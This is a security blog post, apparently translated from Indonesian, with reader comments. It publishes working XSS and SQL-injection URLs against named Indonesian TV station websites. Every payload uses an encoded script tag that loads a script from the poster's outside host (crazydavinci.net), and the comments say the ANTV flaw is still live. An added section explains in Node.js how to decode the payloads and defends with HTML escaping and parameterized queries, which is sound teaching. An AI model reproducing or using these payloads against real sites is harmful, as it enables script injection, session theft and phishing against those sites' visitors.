XSS On Indo TV Stations

Posted by: Joy  :  Category: Vulnerability

Here we’re going to show you XSS (Cross Site Scripting) and what we call XFS (XSS From SQLi) bugs on some Indonesian TV station websites.

As you might already know, cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites was roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end user, who may be subject to unauthorized access, theft of sensitive data, and financial loss. (Taken from Wikipedia.)

Here are some examples of their vulnerable URLs. Every payload below carries the same list of character codes, which decodes to <script src="http://crazydavinci.net/xss.php"></script>: the reflected cases build it with String.fromCharCode and document.write it into the page, the ANTV case has the database return it via MySQL char(). Either way the victim’s browser ends up loading a script from the poster’s own host.

= TransTV =

http://transtv.co.id/200706/sinopsispers.asp (Patched)

http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= SCTV =

http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= Indosiar =

http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= GlobalTV =

http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw=%3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= TVRI =

http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= ANTV =

This is the worst of them: their site is vulnerable to both XSS and SQL injection. But since the topic of this post is only XSS, we will only show the XFS (XSS From SQLi) on their site. Here the script tag is not reflected from the parameter directly; the injected UNION SELECT makes the database return it as a row, and the page prints that row unescaped:
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62%29,0---
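To see what these URLs actually inject, here is an added example of my own (not code from the original post, and not from any of the sites named above). It percent-decodes a query parameter the way a server would, turns the fromCharCode / char() number list back into text without running any attacker JavaScript, and contrasts the raw reflection the vulnerable pages did with HTML-entity encoding. The two query strings are constructed copies of the TransTV and ANTV payloads above; the helper names (getParam, decodeCharCodes, vulnerableRender, safeRender, analyse) are my own, and the search box markup is a stand-in for whatever the real pages rendered.

```javascript
// Added example, not code from the original post. Runs under Node.js
// (URLSearchParams is built in); no network access, nothing is eval'ed.

// The character-code list shared by every payload in the post.
const CODES =
  '60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,' +
  '99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,' +
  '46,112,104,112,34,62,60,47,115,99,114,105,112,116,62';

// Constructed copies of two query strings from the post: the reflected XSS
// against programs.asp?aboutus=... and the UNION-based one against /s/?sid=...
const XSS_QUERY =
  `aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(${CODES}))%3C/script%3E`;
const SQLI_QUERY = `sid=null+union+select+char%28${CODES}%29,0---`;

// Percent-decode one parameter the way a server framework would ('+' -> space).
function getParam(query, name) {
  return new URLSearchParams(query).get(name);
}

// Recover the text hidden in String.fromCharCode(...) or MySQL char(...):
// parse the numbers ourselves instead of handing the string to eval().
function decodeCharCodes(text) {
  const m = /(?:fromCharCode|char)\s*\(\s*([\d\s,]+)\)/i.exec(text);
  if (!m) return null;
  const codes = m[1].split(',').map((n) => parseInt(n.trim(), 10));
  return String.fromCharCode(...codes);
}

// What the vulnerable search pages did: echo untrusted text into the HTML as-is.
// The leading "> in the TransTV payload closes this attribute and the tag.
function vulnerableRender(text) {
  return `<input type="text" name="q" value="${text}">`;
}

// Output encoding for HTML text and quoted-attribute contexts: the five
// characters that can change markup structure become entities, so the
// payload is displayed as inert text instead of being parsed as a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function safeRender(text) {
  return `<input type="text" name="q" value="${escapeHtml(text)}">`;
}

// Bundle the pieces so a reader (or a test) can compare the two renderings.
function analyse(query, name) {
  const param = getParam(query, name);
  return {
    param,
    decoded: decodeCharCodes(param), // the <script src=...> tag being injected
    vulnerable: vulnerableRender(param),
    safe: safeRender(param),
  };
}

// Reflected case: the parameter itself is what gets echoed.
const xss = analyse(XSS_QUERY, 'aboutus');
console.log(`aboutus decodes to: ${xss.decoded}`);
console.log(`raw reflection contains <script: ${xss.vulnerable.includes('<script')}`);
console.log(`escaped output contains <script:  ${xss.safe.includes('<script')}`);

// UNION case: the parameter reaches SQL, and the *query result* (the char()
// string) is what the page renders, so that result needs encoding as well.
const sqli = analyse(SQLI_QUERY, 'sid');
const dbRow = sqli.decoded; // simulated row the injected SELECT would return
console.log(`sid makes the database return: ${dbRow}`);
console.log(`raw row contains <script: ${vulnerableRender(dbRow).includes('<script')}`);
console.log(`escaped row contains <script: ${safeRender(dbRow).includes('<script')}`);
```

escapeHtml is only correct for HTML body text and quoted attribute values; a value dropped into a JavaScript string, a URL, or a CSS block needs that context’s own encoder. For the ANTV case the UNION reaching the database is the bug to fix first (a parameterized query for sid); encoding the output is defence in depth, not a substitute.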

Let’s make Indonesian sites better. ;)


12 Responses to “XSS On Indo TV Stations”


3. Black Shell Says:

    Bro Joy really is awesome,,,
    hahahaha

4. Rio Says:

    Whoa, UNBELIEVABLE, I ♥ Mr. Joy :)

5. Rio Says:

    Mr. Joy, I want to know the latest XSS on FS comments, huhu. Thanks a lot, can you get through it? he

    Off topic? Why was your FS suspended, bro? huhu

6. heri Says:

    Bro, how do you make a website like this……..
    it’s really nice…….

7. Joy Says:

    @rio
    Comment linker? Sorry to say that, for our safety, whether it’s available or not, there will be no more comment linker in public. Ah yes :D my profile was suspended because of the no_one widget v2, I’m more into FB now ;)

    @heri
    This one is based on WordPress, bro Heri, you just tweak it.. :)

8. kopies Says:

    Awesome bro..

    Teach me the FB one, please. ahhahaa.
    You already have my email. heheh.

9. ĦęRяŷüńţĩţĿēđź® ⋋⏝⋌ ĽőÞĥĻĩÞĥĽüÞĥĬЬĻĩźĦ Says:

    Has the ANTV one been patched yet?

10. Joy Says:

    Last time I checked, not yet. Now it’s connection timed out. Maybe there’s a problem with their host…

11. Arturo Revard Says:

    You guys really did great work here, I’m astonished to see the quality, site bookmarked, thanks to the Admins

12. HeRry Says:

    wkwkwkwk turns out the ANTV one still works, it’s lasting really long, huh :D

